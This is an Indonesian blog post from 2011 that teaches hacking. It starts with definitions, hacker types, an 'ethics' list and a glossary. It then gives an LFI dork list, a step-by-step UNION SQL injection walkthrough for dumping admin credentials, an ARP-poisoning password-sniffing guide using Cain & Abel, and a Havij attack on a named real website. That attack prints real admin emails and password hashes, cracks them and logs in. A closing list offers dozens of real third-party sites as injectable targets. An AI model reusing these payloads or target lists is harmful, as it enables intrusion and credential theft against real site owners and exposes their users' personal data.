Selasa, 18 Januari 2011

Belajar Hacking Disini Yuckkk!!! Always Update

1. Definisi hacking 


 apakah yang dimaksud dengan hacking? Definisi paling jelas dan lengkap dari hacking ini, dapat anda jumpai sebagaimana diungkapkan oleh zackary dalam white paper-nya yang berjudul “basic of hacking” yang dimuat di sans. ‘hacking’ merupakan aktivitas penyusupan ke dalam sebuah sistem komputer ataupun jaringan dengan tujuan untuk menyalahgunakan ataupun merusak sistem yang ada.
Definisi dari kata “menyalahgunakan” memiliki arti yang sangat luas, dan dapat diartikan sebagai pencurian data rahasia, serta penggunaan e-mail yang tidak semestinya seperti spamming ataupun mencari celah jaringan yang memungkinkan untuk dimasuki.
Saat ini, marak sekali orang yang memiliki keanehan dengan keisengan mencoba-coba ketangguhan sistem pengaman jaringan sebuah perusahaan ataupun pribadi. Beberapa diantaranya memang memiliki tujuan mulia, yakni mengasah kemampuan mereka di bidang teknologi pengamanan jaringan dan biasanya setelah mereka berhasil menerobos sistem keamanan yang ada, mereka dengan kerelaan hati menginformasikan celah pengamanan yang ada kepada yang bersangkutan untuk disempurnakan. Namun ada juga yang benar-benar murni karena iseng ditunjang oleh motif dendam ataupun niat jahat ingin mencuri sesuatu yang berharga.
Satu hal yang harus dipahami di sini bahwa apapun alasannya ‘hacking’ adalah melangar hukum, dan tidak ada aturan di manapun di dunia yang membenarkan tindakan ini. Namun, realita yang berjalan di kondisi saat ini adalah tidak ada jaminan apapun yang dapat memastikan bahwa tidak ada celah atapun kelemahan dalam sistem jaringan ataupun komputer kita dengan menggunakan sistem operasi apapun. Artinya, cukup jelas tidak ada sistem jaringan yang benar-benar cukup aman yang mampu menjamin 100% tingkat keamanan data dan informasi yang ada di dalamnya. Kondisi ini yang justru memicu maraknya aktivitas hacking dalam berbagai skala dan tingkat aktivitas, mulai level sekedar iseng hingga professional. Hal terpenting yang bisa kita lakukan saat ini hanyalah memastikan bahwa semua celah keamanan telah tertutupi dan kondisi siaga senantiasa diperlakukan.


 2. Profile hacker

 hacker terbagi menjadi dua kelompok besar, yaitu hacker sendiri dan dan attacker/kracker. Di masyarakat awam, banyak sekali terjadi salah pengertian tentang hal ini. Orang cenderung menganggap hacker adalah orang jahat yang suka menjahili komputer ataupun sistem milik orang lain, benarkah seperti itu?
Berdasarkan karakteristiknya secara garis besar, perilakuk hacking terbagi menjadi dua kelompok, yaitu hacker sendiri, yakni orang yang memiliki hobi untuk mengutak-atik isi komputer orang lain/dirinya sendiri dengan tujuan untuk memahami bagaimanakah proses bekerjanya sebuah sistem.
Kebalikan dari hacker adalah attacker/kracker, yakni hacker yang memiliki aktivitas sama namun tujuan yang bertolak belakang, yakni menyalahgunakan ataupun untuk suatu tujuan ataupun kepentingan tertentu dan di luar tujuan untuk memahami sebuah sistem bekerja.


 3. Attacker

 Attacker terdapat 2 Bagian, yaitu

 Outside attacker
Para attacker yang berasal dari luar komunitas sistem jaringan Anda dan melakukan berbagai aktivitas destruktif, dengan menginfiltrasi berbagai sistem jaringan maupun aplikasi yang ada dari luar komunitas.
Contoh, melakukan defacing terhadap situs web dan spamming e-mail server.
Outsiders mencoba membongkar firewall jaringan dalam rangka merusak sistem jaringan internal yang ada di dalam komunitas, dan jalan yang dipergunakan melalui internet, dial-up lines, masuk secara paksa ataupun memanfaatkan jaringan partner yang terhubung dengan komunitas, seperti vendor, customer, ataupun rekanan bisnis.


 Inside attacker
Para attacker yang berasal dari kalangan komunitas itu sendiri dan memiliki hak akses terhadap sistem jaringan internel yang ada, namun menyalahgunakannya ataupun memanfaatkannya dengan melebihkan hak penggunaan sewajarnya yang seharusnya dimiliki. Sebagai contoh, seorang karyawan bagian teller umumnya memiliki priviledge sebagai user, namun setelah infiltrasi ia dapat mengubah berbagai sistem konfigurasi yang ada layaknya seorang administrator.
Insider attack mendominasi berbagai macam aktivitas destruktif yang ada dalam kategori hacking hingga mencapai jumlah 80%. Hal ini dimungkinkan karena faktor aksesibiliti yang dimilikinya mampu untuk melakukan hal tersebut. Di komunitas internet, upaya untuk menjelaskan bahwa hacker bukanlah attacker bukanlah hal yang baru. Namun, upaya ini kurang begitu berhasil karena faktor persepsi yang melekat terutama di kalangan netter baru.


 4. Tiga Kelompok Hacker Berdasarkan Motif

 Disini ada Tiga Jenis Kelompok Hacker, Yaitu

 Black Hat
Para attacker yang menggunakan kemampuannya untuk tujuan kriminal dan cenderung membahayakan kepentingan pihak lain. Pada umumnya orang-orang yang tergabung dalam kelompok ini adalah yang bergerak secara individu atau sesuai idealisme tertentu dan tidak terikat atas kepentingan pihak tertentu.



 Grey Hat
Para hacker yang memberikan informasi yang diperoleh ke para attacker maupun para vendor, untuk memperoleh imbalan tertentu. Kelompok ini dikenal juga sebagai kracker, yakni orang-orang yang tidak memiliki keberpihakan pada pihak manapun dan menjual berbagai informasi yang diperlukan sesuai kebutuhan yang ada.


 White Hat (hacker sejati)
Orang-orang yang melakukan aktivitas hacking dalam rangka memperoleh informasi tentang celah-celah keamanan, maupun kelemahan-kelemahan yang dimiliki untuk diberikan kembali kepada pihak yang bersangkutan untuk disempurnakan kembali.


 5. Tujuh Kelompok Hacker Yang Berdasarkan Profile Kemampuan

 Terdapat 7 Kelompok Hacker Yang Berdasarkan Profile Kemampuan

 Tool Kids/NewBies
Orang-orang yang baru belajar aktivitas hacking, namun kemampuan kemampuan tentang komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktivitas hacking yang dilakukan, umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.


 Cyber Punk
Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan NewBies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup andal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, ia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktivitas-aktivitas yang dilakukan memiliki kecenderungan untuk kriminal, seperti defacing web, carding, ataupun spamming.


 Internals
Orang-orang yang masih bergabung ataupun pernah (mantan) dengan perusahaan TI, dengan kemampuan komputer dan programming yang anda. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contoh, pelanggaran paling sering dilakukan adalah breaking over priviledge activity, yakni segala aktivitas yang melanggar batasan-batasan hak yang dimiliki.


 Coders
Golongan ini dikenal juga sebagai resources, yakni orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat andal dan kelompok ini malakukan berbagai aktivitas infiltrasi dalam rangka untuk memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/kracker yang membutuhkan.


 old guard hackers (idealism gate keepers)
para hacker sejati yang murni melakukan aktivitas-kativitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yakni kemampuan di atas segalanya.


 professional criminals
para attacker/kracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktivitas cyber crime sebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dibantu data/informasi yang diperoleh dari coders. Aktivitas kejahatan yang dilakukan tidak lagi dalam kelas cyber punk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi.


 cyber terrorist
sekolompok orang atau individu yang bertindak atas dasar sentimen pada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktivitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit komunikasi.



 Etika Seorang Hacker

 1. Memiliki kemampuan mengakses komputer tanpa batasan.
2. Semua informasi yg diberikan tidak boleh dipungut bayaran apapun. Tidak ada yg boleh disembunyikan, dan di tutup tutupi.
3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.
4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.
5. Mampu berseni dikomputer

6. Komputer dapat mengubah hidup menjadi lebih baik.
7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.

Setelah itu ini adalah cara main hacker, dalam artian hacker bukan berarti membabibuta menyerang tanpa pikir ::

* Di atas segalanya, hormati pengetahuan & kebebasan informasi.
* Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat. Seperti Bug, dll.
* Jangan mengambil keuntungan yang tidak fair dari hack. Semata mata untuk kepuasan sendiri
* Tidak mendistribusikan & mengumpulkan software bajakan. Tampa maksud tertentu
* Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri. Tudak brutal dalam melakukan hacking
* Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh secara cuma cuma, tampa pamrih
* Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
* Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
* Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack. Keculai maksud tertentu
* Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main

ISTILAH HACKING

1. Backdoor
Pintu belakang untuk masuk ke sistem yg telah berhasil d exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

2. Back connect
Mendapatkan koneksi balik atau mengkonek-kan kompi korban ke kompi kita.

3. Bind
Membuka port pada kompi korban. Biasanya untuk tujuan backdooring. Bind umumnya disertai service-service yang langsung mengakses shell.

4. Bug
Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

5. krack
Program kecil yang biasanya digunakan untuk mengakali perlindungan anti pembajakan dari sebuah piranti lunak berlisensi. Biasanya para pembajak menyertakan krack dalam paket piranti lunak yang mereka distribusikan.

6. Cookie
Sejumlah kecil data, yang sering kali berisi pengenal unik anonim, yang dikirimkan kepada browser Anda dari komputer situs web dan disimpan pada hard drive komputer Anda.

7. Cookie stealer
Teknik yang digunakan untuk mengambil atau mencuri cookie

8. DoS (Denial-of-service attacks)
Jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource)yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

9. DDOS (Distributed Denial of Service)
Salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang “dipaksa” menjadi zombie) untuk menyerang satu buah host target di jaringan.

10. Deface
Merubah tampilan halaman suatu website secara illegal

11. Debug
Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.

12. Dork
Perintah tersembunyi dari google atau keyword yang digunakan hacker untuk mencari target.

13. Exploit
Memanfaatkan bugs yang ditemukan untuk masuk ke dalam sistem.

14. Fake Login
Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email dan password Friendster, Facebook, dll.

15. Fake Process
Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem. Seperti mem-fake “./backdoor” menjadi “usr/sbin/httpd”, sehingga ketika di “ps -ax”, proses “./backdoor” berubah menjadi “usr/sbin/httpd”.

16. Malicious Code/Script
Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.

17. Flood
Membanjiri target untuk tujuan target down. Flood = DoS.
Macam-macam flood:
+ Tsunami flood :
Membanjiri user dengan karakter-karakter berat dengan jumlah banyak, berbentuk seperti gelombang tsunami. Tujuanya hanya membuat user disconnected. Tsunami flood hanya terjadi di irc.
+ TCP Flood :
Membanjiri jalur TCP target sehingga target kehabisan bandwith pada port yg sedang di flood. Pada DDoS web server, TCP flood diserangkan ke port 80 (http), sehingga menyebabkan jalur http penuh.

18. Hashing
Tehknik mengindeks pada manajemen database dimana nilai kunci:key (yang mengindentifikasikan record) …

19. Hacker
Sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.

20. Javascript injection
Suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut. Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).

21. Keylogger
Adalah program atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam-diam alias tidak terketahui oleh kita secara kasat mata).

22. LFI (Local File Inclusion)
Suatu bug dimana kita bisa menginclude-kan file (file yang berada di dalam server yg bersangkutan)ke page yang vulnerable (vulnerable LFI maksudnya).

23. Patch
Perbaikan terhadap bug dengan mengupdate sistem yang vurnerable.

24. Phising
Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

25. Port
menurut bahasa artinya penghubung. Port ada 2 macam :
+ Port fisik :
Penghubung antara CPU dengan hardware external.
+ Port service :
Penghubung antar service/layanan pada sistem.

26. Port Scanning
Memindai/mencari port-port yang terbuka pada suatu server.

27. RFI (Remote File Inclusion)
Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load

28. Root
Pengguna dengan hak tertinggi di dalam, dan tidak ada batasan wewenang, dalam komputer jaringan. Istilah ini diadaptasi dari sistem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

29. Shell
Inti dari sistem operasi. Shell mengendalikan kerja sistem operasinya.

30. Shell intepreter
Bentuk antarmuka yang merupakan penghubung antara shell dengan brainware. Bentuk umumnya berupa console, cmd, webshell, dll.

31. SQL Injection
Memasukkan (injeksi) command-command SQL ke dalam query SQL dalam porgram, memanipulasi query SQL di dalam program.

32. Trojan (Horse)
Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

33. Virus
Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.

34. Vurnerable
Sistem yang memiliki bug sehingga rentan terhadap serangan.

35. Worm (Cacing)
Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

36. XSS (Cross Site Scripting)
Teknik yang digunakan untuk menambahkan script pada sebuah website yang akan dieksekusi oleh user lain pada browser user lain tersebut

 Kumpulan Dork LFI



inurl:index.php?page=
inurl:index.php?id=
inurl:index.php?inc_page=
inurl:index.php?action=
inurl:index.php?main_page=
inurl:main.php?page=
inurl:index.php?pg=
inurl:index.php?content=
inurl:index.php?x=
inurl:index.php?m=
inurl:index.php?n=
inurl:index.php?p=
inurl:index.php?dir=
inurl:index.php?main_page=


  Belajar SQL Injection, Step By Step

 Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


 Trick Belajar Sniffing

 pertama yang dibutuhkan adalah software CAIN N ABEL bisa download
http://www.zid*du.com/download/11150642/ca_setup.exe

Dan yang kedua adalah software The DUDE yang bisa kamu download

http://www.zid*du.com/download/11150...nstall-3.4.exe

Langkah-langkah yang harus dilakukan:
selum kita menggunakan software yang utama( cain n abel) kita install dulu The Dude, lalu jalankan. Dude sebenarnya adalah software yg digunakan untuk memantau jaringan,baik LAN ataupun Hotspot.



dengan di jalankannya Dude,ini akan membantu Cain n abel mencari Mac address yang terhubung /disekitar kita.
lalu selanjutnya


1. Install program Cain&Abel
2. Jalankan Cain
3. Untuk melakukan aksi sniffing, klik tab Sniffer
4. Click tab APR
5. Click menu Configure – akan muncul configure dialog yang berisi tentang beberapa tab configuration – klik tab Sniffer – akan tampak beberapa keterangan tentang Adapter, IP Address dll – klik satu baris di bawah menu-menu tadi yang berisi keterangan IP Address komputer kita, MAC dll – kemudian OK.
6. Active kan Cain dengan mengklik tombol Start
7. Agar komputer kita memiliki kemampuan routing, klik tombol Start APR
8. Jalankan Command Prompt
9. Lakukan komunikasi dengan komputer target dengan melakukan pinging terhadap IP Address komputer target, contoh cing 192.168.0.2, dalam beberapa kasus kita harus melakukan pinging (menurut pengalaman saya, pinging merupakan cara tercepat untuk melakukan komunikasi dengan komputer target) lebih dari satu komputer, hal itu bertujuan untuk menjadikan komputer lain sebagai gateway.
10. Pada Cain ada dua bagian tabel yang bermenu sama Status, IP Address, MAC Address dll. Untuk memulai, klik tabel bagian atas, kemudian klik tanda plus (Add to list)


11. Akan muncul dialog New ARP Poison Routing. Klik IP Address komputer target yang ada di kolom sebelah kiri dan klik IP Address komputer gateway pada kolom sebelah kanan. Klik OK


Setelah IP Address masuk ke dalam list, kita tinggal menunggu lalu lintas packet yang tertangkap oleh Cain. Untuk mengetahui hasil yang tertangkap, klik tab passwords.


NB: KALO BERHASIL MENDAPATKAN USERNAME+PASSWORD TOLONG JANGAN DIGUNAKAN SEMBARANGAN,JANGAN MERUSAK ACCOUNT SESEORANG,CUKUP KITA TAU DAN BISA PRAKTEK INI SAJA.

Download Tools SQLi, XSS, RFI dan LFI Scanner disini


 Belajar Hacking dengan metode SQL Injection


Pertama yang harus agan langkahi yaitu download tools hacking nya yang bernama HAVIJ

 Bingung ya mau download dimana ? oke langsung aja ane kasih tau link nya. tapi ane minta gunakan tools ini dengan sebaik2nya

Download Havij Disini


 Next, Tutorial pembelajaran Hacking WEBSITE

 Web Target Korban kita yaitu = http://www.xenia.co.il/index.php?page_id=93 seperti biasanya berikan tanda ' pada web tersebut menjadi >> http://www.xenia.co.il/index.php?page_id='93

 dan kalau kita klik link yang ada tanda ' nya otomatis

 muncul gambar tersebut yang dinamakan BUG SQL INJECTION

 Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)....

 dan hasilnya akan seperti ini

 hasilnya:

Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable
Current DB: xeniaco_xenia



 nah kita mendapatkan databasenya dan sekarang klik Tables lalu klik Get Tables
 users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1 


Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.

Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja). 




 saya dapatkan kolom sbb

regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1


nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :

name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).


 Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff

w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash krack..



 assword berhasil di-krack.. sekarang tinggal cari halaman login.

Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start.... .... ............. Searching


 Got that....
Page Found: http://www.xenia.co.il/login.php

Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access


 update gan tentang bug sql injetions

 http://atlantasilverbacks.com/news/d...php?id=%271046
http://gwbchurch.com/displaynews.php?id=%2769
http://thedcnews.com/displaynews.php?id=%2725
http://thesilverlakesnews.com/displa...php?id=%275088
http://thespringvalleynews.com/displ...php?id=%275049
http://www.carbidder.com/displaynews.php?id=%2714
http://www.connexions-bury.com/lates...s.php?id=%2788
http://www.connexions-stockport.com/....php?id=%27251
http://www.connexions-stockport.org.....php?id=%27265
http://www.darwincyclingclub.com/new...=%271241142720
http://www.experis.com/displaynews.php?ID=%2712
http://www.freakchictattoo.com/displaynews.php?id=%274
http://www.gihm.co.in/displaynews.php?id=%2710
http://www.hidesertnewsonline.com/di...php?id=%275015
http://www.huilong-lamp.com/cn/displaynews.php?id=%275
http://www.icaibkn.org/displaynews.php?id=%2713
http://www.iccj.or.jp/displaynews.php?id=%27522
http://www.interiordesigncanada.org/....php?ID=%27360
http://www.jazzyshower.com/cn/displaynews.php?id=%271
http://www.korraware.com/displaynews.php?id=%2720
http://www.kwoklam.com.cn/zh-CN/disp...php?id=%274910
http://www.lincatgroup.co.uk/displaynews.php?id=%2776
http://www.marenavigare.com/de/displaynews.php?id=%2729
http://www.nccbank.com.np/displaynews.php?id=%2722
http://www.nsps.com/DisplayNews.php?ID=%2726
http://www.nuomega.com/displaynews.php?id=%2757
http://www.porvoochurches.org/displaynews.php?id=%275
http://www.rusje.no/displaynews.php?id=%27235
http://www.shkl.cc/zh-CN/displaynews.php?id=%2729
http://www.thespringvalleynews.com/d...php?id=%275049
http://www.thevictorvillenews.com/di...s.php?id=%2726
http://www.thewashingtondcnews.com/d....php?id=%27309
http://www.wongfleming.com/displaynews.php?id=%27114
http://www.zmalu.com/cn/displaynews.php?id=%2723
http://www.unidoll.com/en/view.php?pid='70
http://meadowhaven.net/php-bin/view.php?pid='2061
http://www.phuturerave.com/view.php?pID='2916
http://www.songwritersunite.com/view.php?pid='41571
http://www.hotcelebritiespictures.co...?pid='4436
http://www.poolofexperts.ch/profiles...;4a117c72bcf1d
http://www.gallery.md/view.php?pid='532
http://www.village-estates.com/view.php?pid='3096
http://www.capricornprop.com/view.php?pid='46
http://www.homethaicenter.com/view.php?pid='511
http://gallery.souvenirboutique.com/...p?pid='175
http://www.imaniamessenger.com/imani...php?pid='4
http://www.baramatiinitiatives.org/view.php?pID='116
http://www.propertylettingsnetwork.c...?PID='1088
http://www.bob-sinton.com/church-photos/view.php?pid='3
http://www.rainforestgraphics.co.uk/...assettebanners
http://64.34.98.110/view.php?pid='924
http://bc.homelinux.com/eliterary/vi...#39;0000000271
http://royalorchidthaicuisine.com/ga...hp?pID='22
http://www.rainforestgraphics.co.uk/...id='offers
http://mtv.co.kr/tv/idolunited/view.php?pid='148
http://www.maennernetzwerk-dresden.d...hp?pid='29
http://www.pug205.nl/view.php?pid=2&fid=16&tid='6997
http://web.hwes.tc.edu.tw/modules/bo...?pid='5786
http://adec.org.ar/noticias/detalle-...3C%2Fscript%3E
http://bodegasobreruedas.com.ar/?feed=rss2&p=56%27
http://hitravel.com.ar/paquetes_deta...3C%2Fscript%3E
http://launion.com.ar/index.php?opti..._match&id=1%27
http://lcd.efn.unc.edu.ar/sitio_e/fi...u.php?id=13%27
http://mv-inmobiliaria.com.ar/propie...3C%2Fscript%3E
